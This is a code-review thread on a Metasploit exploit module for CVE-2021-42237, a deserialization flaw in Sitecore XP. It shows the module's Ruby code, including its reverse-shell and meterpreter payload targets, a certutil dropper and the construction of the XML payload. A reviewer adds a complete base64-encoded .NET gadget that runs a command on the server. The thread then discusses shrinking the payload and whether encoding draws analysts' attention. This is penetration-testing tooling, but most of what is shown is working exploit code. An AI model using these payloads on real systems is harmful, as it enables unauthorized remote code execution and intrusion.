modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,224 @@
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'WfsDelay' => 60 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),
+      'redirect_depth' => 0
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')
+      return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')
+    end
+
+    return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!')
+  end
+
+  def exploit
+    case target['Type']
+    when :win_cmd
+      print_status('Executing command payload')
+      execute_command(payload.encoded)
+      return
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    main_tag_name = Rex::Text.rand_text_alpha(3..25)
+    xml_payload = %|<?xml version="1.0" ?>
+        <#{main_tag_name}>
+            <query></query>
+            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
```

Comment:
For what it's worth, not all of these tags are needed. See the payload I wrote here: https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=activityFeed

Reply:
Good point, let me see if I can't minimize this down to the bare essentials.

Reply:
Just so no one has to track down what I'm talking about. This is the payload I wrote for AKB:

```
<parameters>
    <parameter name="r7">
        <w b:Type="System.Security.Principal.WindowsIdentity" b:Assembly="mscorlib,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/">
            <System.Security.ClaimsIdentity.actor b:Type="System.String" b:Assembly="0">AAEAAAD/////AQAAAAAAAAAMAgAAABtNaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACUAzxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOmE9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSI+PE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT48YTpQcm9jZXNzPjxhOlByb2Nlc3MuU3RhcnRJbmZvPjxhOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyB3aG9hbWkgJmd0OyBDOlxQcm9ncmFtRGF0YVxsb2wiIEZpbGVOYW1lPSJjbWQiLz48L2E6UHJvY2Vzcy5TdGFydEluZm8+PC9hOlByb2Nlc3M+PC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+PC9PYmplY3REYXRhUHJvdmlkZXI+Cw==</System.Security.ClaimsIdentity.actor>
        </w>
    </parameter>
</parameters>
```

Reply:
@jbaines-r7 Thanks for the feedback, tried to remove the excess stuff in https://github.com/rapid7/metasploit-framework/pull/15858/commits/9d6f0a0eb275ed061c4abe3d00e0b377523a48ed, not sure if you think I should adjust it to use your format which may be smaller in size.

Reply:
Jake lovingly handcrafted that payload. :)

Reply:
I do like that payload inside of `WindowsIdentity` goes over the wire with at least base64 encoding, but I don't think it's a requirement to switch over.

Reply:
I thought base64 encoding might make things more suspicious. At least that and PowerShell often raises a lot of analysts eyebrows. I'll leave this as is for now, but open to opinions if people want to change.

Reply:
but i thought base64 was encryption